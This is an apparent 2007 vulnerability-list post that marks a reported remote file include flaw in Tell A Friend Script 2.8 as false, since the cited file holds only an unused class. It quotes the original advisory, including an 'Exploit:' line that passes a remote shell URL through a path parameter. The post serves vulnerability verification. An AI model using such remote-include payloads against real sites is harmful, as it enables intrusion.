[VIM] false: Tell A Friend Script 2.8 Remote File Include Vulnerability

str0ke str0ke at milw0rm.com
Tue Feb 13 17:14:54 EST 2007


The script template.ext.class.inc.php only contains a class that is never used.

/str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tell A Friend Script 2.8   Remote File Include Vulnerability *

http://www.stadtaus.com/en/php_scripts/tell_a_friend_script/download_tell_a_friend_script.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 function set_include_path($path)
 {
  $this->include_path = $path; *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: *
inc/template.ext.class.inc.php?path=http://shell.txt?  *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


**************************************************************************************************


More information about the VIM mailing list